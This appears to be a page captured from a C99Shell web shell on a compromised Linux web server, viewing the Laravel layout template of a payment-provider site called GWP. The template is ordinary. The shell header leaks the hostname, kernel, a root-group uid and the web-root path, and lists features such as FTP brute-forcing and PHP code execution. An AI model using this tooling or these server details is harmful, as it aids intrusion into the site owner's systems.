!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/resources/views/layout/   drwxr-xr-x
Free 29.02 GB of 117.98 GB (24.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     layout.blade.php (40.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="preload" as="image" href="{{ asset('image/integration.svg') }}">
    <link rel="preload" as="image" href="{{ asset('image/billing.svg') }}">
    <link rel="preload" as="image" href="{{ asset('image/secure.svg') }}">
    <link rel="stylesheet" href="{{ asset('css/a908a227fb3cc0b6.css') }}">
    <link rel="preload" as="image" href="{{ asset('image/support.svg') }}">
    <link rel="stylesheet" href="_next/static/css/a908a227fb3cc0b6.css" data-precedence="next">
    <link rel="preload" as="script" fetchpriority="low" href="_next/static/chunks/webpack-265bc752b349d040.js">
    <script src="_next/static/chunks/fd9d1056-82fc2a82826c61b9.js" async=""></script>
    <script src="_next/static/chunks/23-1b68e5aa48aa08f3.js" async=""></script>
    <script src="_next/static/chunks/main-app-f73cdb3bce740b12.js" async=""></script>
    <script src="_next/static/chunks/0e5ce63c-fbd6c160855e6dc9.js" async=""></script>
    <script src="_next/static/chunks/30-f592b2a114fd1bc4.js" async=""></script>
    <script src="_next/static/chunks/706-65e5da1060cffd78.js" async=""></script>
    <script src="_next/static/chunks/225-86f9db8b67d87f40.js" async=""></script>
    <script src="_next/static/chunks/app/page-4679b6e7df77e692.js" async=""></script>
    <script src="_next/static/chunks/app/layout-3801ddffad0ca02b.js" async=""></script>
    <title>GWP - Your Payment Provider</title>
    <link rel="icon" href="favicon.ico">
    <script src="_next/static/chunks/polyfills-78c92fac7aa8fdd8.js" nomodule=""></script>
</head>
@yield('css')
<style>
    .cursor-not-allowed {
        cursor: not-allowed;
    }

    .top-18 {
        top: 8rem;
    }
</style>

<body>
    <script>
        ! function() {
            try {
                var d = document.documentElement,
                    c = d.classList;
                c.remove('light', 'dark');
                var e = localStorage.getItem('theme');
                if ('system' === e || (!e && true)) {
                    var t = '(prefers-color-scheme: dark)',
                        m = window.matchMedia(t);
                    if (m.media !== t || m.matches) {
                        d.style.colorScheme = 'dark';
                        c.add('dark')
                    } else {
                        d.style.colorScheme = 'light';
                        c.add('light')
                    }
                } else if (e) {
                    c.add(e || '')
                }
                if (e === 'light' || e === 'dark') d.style.colorScheme = e
            } catch (e) {}
        }()
    </script>
    <div class="flex flex-col min-h-screen bg-gray-50 dark:bg-gray-900 text-gray-900 dark:text-gray-100">
        <header class="bg-white shadow-sm">
            <div
                class="jsx-389692e235f2b5aa bg-white dark:bg-gray-900 transition-colors duration-200 fixed top-0 left-0 w-full z-50">
                <div
                    class="jsx-389692e235f2b5aa max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-4 flex justify-between items-center">
                    <div class="jsx-389692e235f2b5aa flex items-center"><a href="/">
                            <img alt="GWP" loading="lazy" width="100" height="100" decoding="async"
                                data-nimg="1" style="color:transparent" src="{{ asset('image/logo_GWP.jpg') }}"></a>
                    </div>
                    <nav class="jsx-389692e235f2b5aa hidden md:flex space-x-8 items-center">
                        <div class="jsx-389692e235f2b5aa relative"><a
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                href="/">Home</a></div>
                        <div class="jsx-389692e235f2b5aa relative"><a
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                href="{{ route('payment_solutions') }}">Payment Solutions</a></div>
                        {{-- <div class="jsx-389692e235f2b5aa relative"><button
                                class="jsx-389692e235f2b5aa text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">Our
                                Service<!-- --> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                    viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
                                    stroke-linecap="round" stroke-linejoin="round"
                                    class="lucide lucide-chevron-down ml-1 h-4 w-4">
                                    <path d="m6 9 6 6 6-6"></path>
                                </svg></button></div> --}}
                        <div class="relative inline-block text-left">
                            <!-- Dropdown Button -->
                            <button id="dropdownButton"
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">
                                Our Service
                                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                    viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
                                    stroke-linecap="round" stroke-linejoin="round" class="ml-1 h-4 w-4">
                                    <path d="m6 9 6 6 6-6"></path>
                                </svg>
                            </button>

                            <!-- Dropdown Menu -->
                            <div id="dropdownMenu"
                                class="hidden absolute right-0 mt-2 w-48 bg-white dark:bg-gray-800 border border-gray-200 dark:border-gray-700 shadow-lg rounded-md z-50">
                                <a href="{{ route('consulting') }}"
                                    class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md">
                                    Consulting Service
                                </a>
                                <a href="{{ route('marketing') }}"
                                    class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md">
                                    Marketing Service
                                </a>
                            </div>
                        </div>

                        <div class="jsx-389692e235f2b5aa relative"><a
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                href="{{ route('contact') }}">Contact</a></div>
                        <div class="jsx-389692e235f2b5aa relative"><a
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                href="{{ route('blog') }}">Blog</a></div>
                        <div class="jsx-389692e235f2b5aa relative"><a
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                href="{{ route('career') }}">Career</a></div>
                        <div class="jsx-389692e235f2b5aa relative">
                            <span
                                class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor cursor-not-allowed">
                                Dev Docs
                            </span>
                        </div>
                        <div class="relative inline-block text-left">
                            <button id="loginDropdownHomeBtn"
                                class="inline-flex items-center justify-center whitespace-nowrap rounded-md text-sm font-medium transition-colors focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring disabled:pointer-events-none disabled:opacity-50 hover:bg-accent h-9 px-4 py-2 dark:text-gray-300 hover:text-paycombatColor dark:hover:text-paycombatColor bg-paycombatColor text-white"
                                type="button" id="radix-:R14mfkq:" aria-haspopup="menu" aria-expanded="false"
                                data-state="closed">Log in</button>
                            <div id="loginDropdownHome"
                                class="hidden absolute right-0 mt-2 w-48 bg-white dark:bg-gray-800 border border-gray-200 dark:border-gray-700 shadow-lg rounded-md z-50">
                                <span
                                    class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Login
                                    as Merchant</span>
                                <span
                                    class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Login
                                    as Partner</span>
                            </div>
                        </div>
                        <div class="relative inline-block text-left" style="margin-left: 0">
                            <button id="signupDropdownHomeBtn"
                                class="inline-flex items-center justify-center whitespace-nowrap rounded-md text-sm font-medium transition-colors focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring disabled:pointer-events-none disabled:opacity-50 hover:bg-accent h-9 px-4 py-2 dark:text-gray-300 hover:text-paycombatColor dark:hover:text-paycombatColor bg-paycombatColor text-white"
                                type="button" id="radix-:R1kmfkq:" aria-haspopup="menu" aria-expanded="false"
                                data-state="closed" style="margin-left: 10px">Sign Up
                            </button>
                            <div id="signupDropdownHome"
                                class="hidden absolute right-0 mt-2 w-48 bg-white dark:bg-gray-800 border border-gray-200 dark:border-gray-700 shadow-lg rounded-md z-50">
                                <span
                                    class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Sign
                                    up as Merchant</span>
                                <span
                                    class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Sign
                                    up as Partner</span>
                            </div>
                        </div>
                    </nav>
                    <div class="jsx-389692e235f2b5aa flex items-center space-x-4 md:hidden"><button
                            class="inline-flex items-center justify-center whitespace-nowrap rounded-md text-sm font-medium transition-colors focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring disabled:pointer-events-none disabled:opacity-50 hover:bg-accent h-9 px-4 py-2 dark:text-gray-300 hover:text-paycombatColor dark:hover:text-paycombatColor bg-paycombatColor text-white"
                            type="button" id="radix-:Rmmfkq:" aria-haspopup="menu" aria-expanded="false"
                            data-state="closed">Log in</button><button
                            class="inline-flex items-center justify-center whitespace-nowrap rounded-md text-sm font-medium transition-colors focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring disabled:pointer-events-none disabled:opacity-50 hover:bg-accent h-9 px-4 py-2 dark:text-gray-300 hover:text-paycombatColor dark:hover:text-paycombatColor bg-paycombatColor text-white"
                            type="button" id="radix-:R16mfkq:" aria-haspopup="menu" aria-expanded="false"
                            data-state="closed" style="margin-left: 10px">Sign Up</button><button
                            id="mobile-menu-toggle"
                            class="jsx-389692e235f2b5aa text-gray-500 dark:text-gray-300 focus:outline-none"><svg
                                xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24"
                                fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                                stroke-linejoin="round" class="lucide lucide-menu h-6 w-6">
                                <line x1="4" x2="20" y1="12" y2="12"></line>
                                <line x1="4" x2="20" y1="6" y2="6"></line>
                                <line x1="4" x2="20" y1="18" y2="18"></line>
                            </svg></button></div>
                    <div id="mobile-menu"
                        class="jsx-389692e235f2b5aa md:hidden fixed top-18 left-0 w-full  bg-white dark:bg-gray-900 shadow-lg z-50 transition-all duration-300 ease-in-out opacity-0 pointer-events-none">
                        <nav class="jsx-389692e235f2b5aa flex flex-col space-y-4 p-4 overflow-y-auto">
                            <div class="jsx-389692e235f2b5aa"><a
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                    href="/">Home</a></div>
                            <div class="jsx-389692e235f2b5aa"><a
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                    href="{{ route('payment_solutions') }}">Payment Solutions</a>
                            </div>
                            {{-- <div class="jsx-389692e235f2b5aa"><button
                                    class="jsx-389692e235f2b5aa text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">Our
                                    Service<!-- --> <svg xmlns="http://www.w3.org/2000/svg" width="24"
                                        height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor"
                                        stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
                                        class="lucide lucide-chevron-down ml-1 h-4 w-4">
                                        <path d="m6 9 6 6 6-6"></path>
                                    </svg></button></div> --}}
                            <!-- Our Service Dropdown -->
                            <div class="relative inline-block text-left">
                                <button id="serviceDropdownBtn"
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">
                                    Our Service
                                    <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20"
                                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                                        stroke-linejoin="round" class="ml-1 h-4 w-4 transition-transform duration-200"
                                        id="serviceChevron">
                                        <path d="m6 9 6 6 6-6"></path>
                                    </svg>
                                </button>

                                <!-- Dropdown Menu -->
                                <div id="serviceDropdown"
                                    class="hidden absolute left-0 mt-2 w-52 bg-white dark:bg-gray-800 rounded-md shadow-lg z-50">
                                    <a href="{{ route('consulting') }}"
                                        class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md">Consulting
                                        Service</a>
                                    <a href="{{ route('marketing') }}"
                                        class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md">Marketing
                                        Service</a>
                                </div>
                            </div>

                            <div class="jsx-389692e235f2b5aa"><a
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                    href="{{ route('contact') }}">Contact</a></div>
                            <div class="jsx-389692e235f2b5aa"><a
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                    href="{{ route('blog') }}">Blog</a></div>
                            <div class="jsx-389692e235f2b5aa"><a
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor"
                                    href="{{ route('career') }}">Career</a></div>
                            <div class="jsx-389692e235f2b5aa"><span
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor cursor-not-allowed">Dev
                                    Docs</span></div>
                            {{-- <div class="jsx-389692e235f2b5aa"><button
                                    class="jsx-389692e235f2b5aa text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">Log
                                    in <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                        viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
                                        stroke-linecap="round" stroke-linejoin="round"
                                        class="lucide lucide-chevron-down ml-1 h-4 w-4">
                                        <path d="m6 9 6 6 6-6"></path>
                                    </svg></button></div>
                            <div class="jsx-389692e235f2b5aa"><button
                                    class="jsx-389692e235f2b5aa text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">Sign
                                    Up <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                        viewbox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
                                        stroke-linecap="round" stroke-linejoin="round"
                                        class="lucide lucide-chevron-down ml-1 h-4 w-4">
                                        <path d="m6 9 6 6 6-6"></path>
                                    </svg></button></div> --}}
                            <!-- Login Dropdown -->
                            <div class="relative inline-block text-left">
                                <button id="loginDropdownBtn"
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">
                                    Log in
                                    <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20"
                                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                                        stroke-linejoin="round" class="ml-1 h-4 w-4">
                                        <path d="m6 9 6 6 6-6"></path>
                                    </svg>
                                </button>

                                <!-- Dropdown Menu -->
                                <div id="loginDropdown"
                                    class="hidden absolute left-0 mt-2 w-48 bg-white dark:bg-gray-800 rounded-md shadow-lg z-50">
                                    <span
                                        class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Login
                                        as Merchant</span>
                                    <span
                                        class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Login
                                        as Partner</span>
                                </div>
                            </div>

                            <!-- Signup Dropdown -->
                            <div class="relative inline-block text-left">
                                <button id="signupDropdownBtn"
                                    class="text-gray-500 dark:text-gray-300 hover:text-GWPColor dark:hover:text-GWPColor focus:outline-none flex items-center">
                                    Sign Up
                                    <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20"
                                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                                        stroke-linejoin="round" class="ml-1 h-4 w-4">
                                        <path d="m6 9 6 6 6-6"></path>
                                    </svg>
                                </button>

                                <!-- Dropdown Menu -->
                                <div id="signupDropdown"
                                    class="hidden absolute left-0 mt-2 w-52 bg-white dark:bg-gray-800 rounded-md shadow-lg z-50">
                                    <span
                                        class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Sign
                                        up as Merchant</span>
                                    <span
                                        class="block px-4 py-2 text-gray-700 dark:text-white hover:bg-gray-100 dark:hover:bg-gray-700 rounded-md cursor-not-allowed">Sign
                                        up as Partner</span>
                                </div>
                            </div>

                            {{-- <div class="jsx-389692e235f2b5aa pt-4"><button
                                    class="inline-flex items-center justify-center whitespace-nowrap rounded-md text-sm font-medium transition-colors focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-ring disabled:pointer-events-none disabled:opacity-50 border border-input bg-background shadow-sm hover:bg-accent hover:text-accent-foreground h-9 w-9"
                                    type="button" id="radix-:R28mfkq:" aria-haspopup="menu" aria-expanded="false"
                                    data-state="closed"><svg width="15" height="15" viewbox="0 0 15 15"
                                        fill="none" xmlns="http://www.w3.org/2000/svg"
                                        class="h-[1.2rem] w-[1.2rem] rotate-0 scale-100 transition-all dark:-rotate-90 dark:scale-0">
                                        <path
                                            d="M7.5 0C7.77614 0 8 0.223858 8 0.5V2.5C8 2.77614 7.77614 3 7.5 3C7.22386 3 7 2.77614 7 2.5V0.5C7 0.223858 7.22386 0 7.5 0ZM2.1967 2.1967C2.39196 2.00144 2.70854 2.00144 2.90381 2.1967L4.31802 3.61091C4.51328 3.80617 4.51328 4.12276 4.31802 4.31802C4.12276 4.51328 3.80617 4.51328 3.61091 4.31802L2.1967 2.90381C2.00144 2.70854 2.00144 2.39196 2.1967 2.1967ZM0.5 7C0.223858 7 0 7.22386 0 7.5C0 7.77614 0.223858 8 0.5 8H2.5C2.77614 8 3 7.77614 3 7.5C3 7.22386 2.77614 7 2.5 7H0.5ZM2.1967 12.8033C2.00144 12.608 2.00144 12.2915 2.1967 12.0962L3.61091 10.682C3.80617 10.4867 4.12276 10.4867 4.31802 10.682C4.51328 10.8772 4.51328 11.1938 4.31802 11.3891L2.90381 12.8033C2.70854 12.9986 2.39196 12.9986 2.1967 12.8033ZM12.5 7C12.2239 7 12 7.22386 12 7.5C12 7.77614 12.2239 8 12.5 8H14.5C14.7761 8 15 7.77614 15 7.5C15 7.22386 14.7761 7 14.5 7H12.5ZM10.682 4.31802C10.4867 4.12276 10.4867 3.80617 10.682 3.61091L12.0962 2.1967C12.2915 2.00144 12.608 2.00144 12.8033 2.1967C12.9986 2.39196 12.9986 2.70854 12.8033 2.90381L11.3891 4.31802C11.1938 4.51328 10.8772 4.51328 10.682 4.31802ZM8 12.5C8 12.2239 7.77614 12 7.5 12C7.22386 12 7 12.2239 7 12.5V14.5C7 14.7761 7.22386 15 7.5 15C7.77614 15 8 14.7761 8 14.5V12.5ZM10.682 10.682C10.8772 10.4867 11.1938 10.4867 11.3891 10.682L12.8033 12.0962C12.9986 12.2915 12.9986 12.608 12.8033 12.8033C12.608 12.9986 12.2915 12.9986 12.0962 12.8033L10.682 11.3891C10.4867 11.1938 10.4867 10.8772 10.682 10.682ZM5.5 7.5C5.5 6.39543 6.39543 5.5 7.5 5.5C8.60457 5.5 9.5 6.39543 9.5 7.5C9.5 8.60457 8.60457 9.5 7.5 9.5C6.39543 9.5 5.5 8.60457 5.5 7.5ZM7.5 4.5C5.84315 4.5 4.5 5.84315 4.5 7.5C4.5 9.15685 5.84315 10.5 7.5 10.5C9.15685 10.5 10.5 9.15685 10.5 7.5C10.5 5.84315 9.15685 4.5 7.5 4.5Z"
                                            fill="currentColor" fill-rule="evenodd" clip-rule="evenodd"></path>
                                    </svg><svg width="15" height="15" viewbox="0 0 15 15" fill="none"
                                        xmlns="http://www.w3.org/2000/svg"
                                        class="absolute h-[1.2rem] w-[1.2rem] rotate-90 scale-0 transition-all dark:rotate-0 dark:scale-100">
                                        <path
                                            d="M2.89998 0.499976C2.89998 0.279062 2.72089 0.0999756 2.49998 0.0999756C2.27906 0.0999756 2.09998 0.279062 2.09998 0.499976V1.09998H1.49998C1.27906 1.09998 1.09998 1.27906 1.09998 1.49998C1.09998 1.72089 1.27906 1.89998 1.49998 1.89998H2.09998V2.49998C2.09998 2.72089 2.27906 2.89998 2.49998 2.89998C2.72089 2.89998 2.89998 2.72089 2.89998 2.49998V1.89998H3.49998C3.72089 1.89998 3.89998 1.72089 3.89998 1.49998C3.89998 1.27906 3.72089 1.09998 3.49998 1.09998H2.89998V0.499976ZM5.89998 3.49998C5.89998 3.27906 5.72089 3.09998 5.49998 3.09998C5.27906 3.09998 5.09998 3.27906 5.09998 3.49998V4.09998H4.49998C4.27906 4.09998 4.09998 4.27906 4.09998 4.49998C4.09998 4.72089 4.27906 4.89998 4.49998 4.89998H5.09998V5.49998C5.09998 5.72089 5.27906 5.89998 5.49998 5.89998C5.72089 5.89998 5.89998 5.72089 5.89998 5.49998V4.89998H6.49998C6.72089 4.89998 6.89998 4.72089 6.89998 4.49998C6.89998 4.27906 6.72089 4.09998 6.49998 4.09998H5.89998V3.49998ZM1.89998 6.49998C1.89998 6.27906 1.72089 6.09998 1.49998 6.09998C1.27906 6.09998 1.09998 6.27906 1.09998 6.49998V7.09998H0.499976C0.279062 7.09998 0.0999756 7.27906 0.0999756 7.49998C0.0999756 7.72089 0.279062 7.89998 0.499976 7.89998H1.09998V8.49998C1.09998 8.72089 1.27906 8.89997 1.49998 8.89997C1.72089 8.89997 1.89998 8.72089 1.89998 8.49998V7.89998H2.49998C2.72089 7.89998 2.89998 7.72089 2.89998 7.49998C2.89998 7.27906 2.72089 7.09998 2.49998 7.09998H1.89998V6.49998ZM8.54406 0.98184L8.24618 0.941586C8.03275 0.917676 7.90692 1.1655 8.02936 1.34194C8.17013 1.54479 8.29981 1.75592 8.41754 1.97445C8.91878 2.90485 9.20322 3.96932 9.20322 5.10022C9.20322 8.37201 6.82247 11.0878 3.69887 11.6097C3.45736 11.65 3.20988 11.6772 2.96008 11.6906C2.74563 11.702 2.62729 11.9535 2.77721 12.1072C2.84551 12.1773 2.91535 12.2458 2.98667 12.3128L3.05883 12.3795L3.31883 12.6045L3.50684 12.7532L3.62796 12.8433L3.81491 12.9742L3.99079 13.089C4.11175 13.1651 4.23536 13.2375 4.36157 13.3059L4.62496 13.4412L4.88553 13.5607L5.18837 13.6828L5.43169 13.7686C5.56564 13.8128 5.70149 13.8529 5.83857 13.8885C5.94262 13.9155 6.04767 13.9401 6.15405 13.9622C6.27993 13.9883 6.40713 14.0109 6.53544 14.0298L6.85241 14.0685L7.11934 14.0892C7.24637 14.0965 7.37436 14.1002 7.50322 14.1002C11.1483 14.1002 14.1032 11.1453 14.1032 7.50023C14.1032 7.25044 14.0893 7.00389 14.0623 6.76131L14.0255 6.48407C13.991 6.26083 13.9453 6.04129 13.8891 5.82642C13.8213 5.56709 13.7382 5.31398 13.6409 5.06881L13.5279 4.80132L13.4507 4.63542L13.3766 4.48666C13.2178 4.17773 13.0353 3.88295 12.8312 3.60423L12.6782 3.40352L12.4793 3.16432L12.3157 2.98361L12.1961 2.85951L12.0355 2.70246L11.8134 2.50184L11.4925 2.24191L11.2483 2.06498L10.9562 1.87446L10.6346 1.68894L10.3073 1.52378L10.1938 1.47176L9.95488 1.3706L9.67791 1.2669L9.42566 1.1846L9.10075 1.09489L8.83599 1.03486L8.54406 0.98184ZM10.4032 5.30023C10.4032 4.27588 10.2002 3.29829 9.83244 2.40604C11.7623 3.28995 13.1032 5.23862 13.1032 7.50023C13.1032 10.593 10.596 13.1002 7.50322 13.1002C6.63646 13.1002 5.81597 12.9036 5.08355 12.5522C6.5419 12.0941 7.81081 11.2082 8.74322 10.0416C8.87963 10.2284 9.10028 10.3497 9.34928 10.3497C9.76349 10.3497 10.0993 10.0139 10.0993 9.59971C10.0993 9.24256 9.84965 8.94373 9.51535 8.86816C9.57741 8.75165 9.63653 8.63334 9.6926 8.51332C9.88358 8.63163 10.1088 8.69993 10.35 8.69993C11.0403 8.69993 11.6 8.14028 11.6 7.44993C11.6 6.75976 11.0406 6.20024 10.3505 6.19993C10.3853 5.90487 10.4032 5.60464 10.4032 5.30023Z"
                                            fill="currentColor" fill-rule="evenodd" clip-rule="evenodd"></path>
                                    </svg><span class="sr-only">Toggle theme</span></button>
                            </div> --}}
                        </nav>
                    </div>
                    <div class="hidden md:flex items-center space-x-4">
                        <button id="theme-toggle" aria-label="Toggle theme"
                            class="inline-flex items-center justify-center rounded-md text-sm font-medium border border-input bg-background shadow-sm h-9 w-9 transition-colors hover:bg-accent hover:text-accent-foreground focus:outline-none focus:ring-1 focus:ring-ring">
                            <svg id="sun-icon" class="h-5 w-5" xmlns="http://www.w3.org/2000/svg" fill="none"
                                viewBox="0 0 24 24" stroke="currentColor">
                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                    d="M12 2v2m0 16v2m10-10h-2M4 12H2m16.364-7.364l-1.414 1.414M6.05 17.95l-1.414 1.414M17.95 17.95l-1.414-1.414M6.05 6.05L4.636 7.464M12 6a6 6 0 100 12 6 6 0 000-12z" />
                            </svg>

                            <svg id="moon-icon" class="h-5 w-5 hidden" xmlns="http://www.w3.org/2000/svg"
                                fill="none" viewBox="0 0 24 24" stroke="currentColor">
                                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                                    d="M21 12.79A9 9 0 1111.21 3a7 7 0 009.79 9.79z" />
                            </svg>
                        </button>
                    </div>
                </div>
            </div>
        </header>
        @yield('main-section')
        <footer class="bg-gray-800 text-white">
            <div class="container mx-auto px-4 py-12">
                <div class="grid grid-cols-1 md:grid-cols-3 gap-8">
                    <div>
                        <h3 class="text-lg font-semibold mb-4">Company</h3>
                        <ul class="space-y-2">
                            <li><span class="hover:text-primary cursor-not-allowed">About Us</span></li>
                            <li><a class="hover:text-primary" href="{{ route('contact') }}">Contact</a></li>
                        </ul>
                    </div>
                    <div>
                        <h3 class="text-lg font-semibold mb-4">Resources</h3>
                        <ul class="space-y-2">
                            <li><a class="hover:text-primary" href="{{ route('blog') }}">Blog</a></li>
                            <li><span class="hover:text-primary cursor-not-allowed">API Docs</span></li>
                        </ul>
                    </div>
                    <div>
                        <h3 class="text-lg font-semibold mb-4">Legal</h3>
                        <ul class="space-y-2">
                            <li><a class="hover:text-primary" href="{{ route('privacy_policy') }}">Privacy Policy</a>
                            </li>
                            <li><a class="hover:text-primary" href="{{ route('term_of_service') }}">Terms of
                                    Service</a></li>
                        </ul>
                    </div>
                </div>
                <div
                    class="mt-8 border-t border-muted-foreground/20 pt-8 flex flex-col md:flex-row justify-between items-center">
                    <p>© 2024 GWP. All rights reserved.</p>
                    <div class="flex space-x-4 mt-4 md:mt-0"><a class="hover:text-primary"
                            href="https://t.me/GWPsp"><svg xmlns="http://www.w3.org/2000/svg" width="24"
                                height="24" viewbox="0 0 24 24" fill="none" stroke="currentColor"
                                stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
                                class="lucide lucide-send h-6 w-6">
                                <path
                                    d="M14.536 21.686a.5.5 0 0 0 .937-.024l6.5-19a.496.496 0 0 0-.635-.635l-19 6.5a.5.5 0 0 0-.024.937l7.93 3.18a2 2 0 0 1 1.112 1.11z">
                                </path>
                                <path d="m21.854 2.147-10.94 10.939"></path>
                            </svg><span class="sr-only">Telegram</span></a></div>
                </div>
            </div>
        </footer>
    </div>
    <script src="_next/static/chunks/webpack-265bc752b349d040.js" async=""></script>
    <script>
        (self.__next_f = self.__next_f || []).push([0]);
        self.__next_f.push([2, null])
    </script>
    <script>
        self.__next_f.push([1, "1:HL[\"/_next/static/css/a908a227fb3cc0b6.css\",\"style\"]\n"])
    </script>
    <script>
        self.__next_f.push([1,
            "2:I[5751,[],\"\"]\n4:I[6513,[],\"ClientPageRoot\"]\n5:I[3943,[\"310\",\"static/chunks/0e5ce63c-fbd6c160855e6dc9.js\",\"30\",\"static/chunks/30-f592b2a114fd1bc4.js\",\"706\",\"static/chunks/706-65e5da1060cffd78.js\",\"225\",\"static/chunks/225-86f9db8b67d87f40.js\",\"931\",\"static/chunks/app/page-4679b6e7df77e692.js\"],\"default\",1]\n6:I[4858,[\"185\",\"static/chunks/app/layout-3801ddffad0ca02b.js\"],\"ThemeProvider\"]\n7:I[9275,[],\"\"]\n8:I[1343,[],\"\"]\na:I[6130,[],\"\"]\nb:[]\n"
        ])
    </script>
    <script>
        self.__next_f.push([1,
